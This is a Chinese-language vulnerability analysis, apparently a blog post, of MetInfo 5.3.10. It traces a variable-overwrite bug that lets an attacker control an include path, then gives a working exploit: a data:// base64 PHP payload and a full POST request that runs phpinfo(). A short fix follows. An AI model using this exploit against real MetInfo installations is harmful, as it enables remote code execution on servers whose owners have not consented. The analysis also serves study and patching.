0x00 MetInfo
MetInfo采用PHP+Mysql架构,是一款对SEO非常友好、功能全面、安全稳定、支持多终端展示并且使用起来极其简单的企业建站系统。
0x01 命令执行 文件包含
命令执行:应用有时需要调用一些执行系统命令的函数,如PHP中的system、exec、shell_exec、
passthru、popen、proc_popen等,当用户能控制这些函数中的参数时,就可以将恶意系统命令
拼接到正常命令中,从而造成命令执行攻击,这就是命令执行漏洞。
文件包含:由于程序员未对用户可控的变量进行输入检查,导致用户可以控制被包含的文件,成功利用时可以使web server会将特定文件当成php执行,从而导致用户可获取一定的服务器权限。
此次产生漏洞的版本号为Metinfo5.3.10,源码大家可以下载。
0x02 漏洞分析
文件admin/login/login_check.php:26行
f($action=="login"){ $metinfo_admin_name = $login_name; $metinfo_admin_pass = $login_pass; $metinfo_admin_pass=md5($metinfo_admin_pass); /*code*/ if($met_login_code==1){ require_once $depth.'../include/captcha.class.php'; $Captcha= new Captcha(); if(!$Captcha->CheckCode($code)){ echo("<script type='text/javascript'>alert('$lang_logincodeerror');location.href='login.php?langset=$langset';</script>"); exit; } }
|
登录检测的,当后台开启登录校验码的时候$met_login_code会设置为1,然后require_once 去包含校验码登录文件。只要我们控制了变量$depth就可以进行远程文件包含了。
而$depth变量是在文件’admin/login/login_check.php’开头定义的。
error_reporting(E_ERROR | E_WARNING | E_PARSE); if($depth!=''&&$depth!='../'&&$depth!='../../'){die();} if(!isset($depth))$depth=''; $commonpath=$depth.'include/common.inc.php'; $commonpath=$admin_index?$commonpath:'../'.$commonpath; define('SQL_DETECT',1);
|
通过第一次拼接$depth包含了include/common.inc.php,前面几步可能没什么问题,这一步也没有问题的,包含了文件common.inc.php之后,但是common.inc.php中可以通过以下代码进行变量覆盖。
文件:include/common.inc.php:35
foreach(array('_COOKIE', '_POST', '_GET') as $_request) { foreach($$_request as $_key => $_value) { $_key{0} != '_' && $$_key = daddslashes($_value,0,0,1); $_M['form'][$_key] = daddslashes($_value,0,0,1); } }
|
对页面提交过来的数据,包括cookie,post, get三种数据进行转义。
但是此处却存在一个变量覆盖漏洞,这里我们简单本地演示一下:
<?php $a='hello'; foreach($_GET as $key => $value){ $$key = $value; } print $a; ?>
|
当我们get提交一个a值时,它会覆盖掉以前所定义,产生变量覆盖
0x03 漏洞利用
我们可以利用变量覆盖漏洞覆盖掉变量$deph。
本地文件包含用require_once来执行代码,但是
if($depth!=''&&$depth!='../'&&$depth!='../../'){die();}
|
对depth进行了过滤,我们可以使用php的封装协议data://配合require_once来进行恶意代码执行。
还有一个问题
require_once $depth.'../include/captcha.class.php';
|
这一串拼接在字符后面的字符串的干扰,这一段会干扰我们想要执行的代码。
用base64解码正常文字会让后面这一串字符变成乱码,并且加上了单行注释符号注释掉乱码。
封装器解码之后代码的样子
<?php phpinfo();exit();// ..þ)Üç^ýÆ©µÈZ.rV¬s.php
|
这样我们构造exp进行测试,前提后台开启了登录验证码:
POST /MetInfo_5.3.10/admin/login/login_check.php?langset=cn&depth=data://text/plain;base64,PD9waHAgcGhwaW5mbygpO2V4aXQoKTsvLw== HTTP/1.1 Host: 127.0.0.1 Content-Length: 83 Cache-Control: max-age=0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Origin: http://127.0.0.1 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.101 Safari/537.36 Content-Type: application/x-www-form-urlencoded Referer: http://127.0.0.1/MetInfo_5.3.10/admin/login/login.php Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.8 Cookie: _ga=GA1.1.1522517218.1476456267; tablepage_json=0%7Csystem%2Cnews%2Cdonews_info; ft127001=0; recordurl=%2Chttp%253A%252F%252F127.0.0.1%252FMetInfo_5.3.10%252F%2Chttp%253A%252F%252F127.0.0.1%252FMetInfo_5.3.10%252Findex.php%253Flang%253Dcn%2Chttp%253A%252F%252F127.0.0.1%252FMetInfo_5.3.10%252Findex.php%253Flang%253Dcn%2Chttp%253A%252F%252F127.0.0.1%252FMetInfo_5.3.10%252Findex.php%253Flang%253Dcn%2Chttp%253A%252F%252F127.0.0.1%252FMetInfo_5.3.10%252Findex.php%253Flang%253Dcn%2Chttp%253A%252F%252F127.0.0.1%252FMetInfo_5.3.10%252F%2Chttp%253A%252F%252F127.0.0.1%252FMetInfo_5.3.10%252F%2Chttp%253A%252F%252F127.0.0.1%252FMetInfo_5.3.10%252F%2Chttp%253A%252F%252F127.0.0.1%252FMetInfo_5.3.10%252F%2Chttp%253A%252F%252F127.0.0.1%252FMetInfo_5.3.10%252Findex.php%253Flang%253Dcn; re_url=http%3A%2F%2F127.0.0.1%2FMetInfo_5.3.10%2Fadmin%2F; met_capcha=1f1ezzrSrlMNL9bl5TC1%2F2CBMinv2dvD8CX74vlrMRbq Connection: close action=login&login_name=admin&login_pass=123456&code=8CAA&Submit=%E7%99%BB%E5%BD%95
|
执行了phpinfo()
因为使用了data://,所以需要php.ini 中allow_url_include =on
0x04、漏洞修复
包含include/common.inc.php再次给$depth赋值,防止变量被污染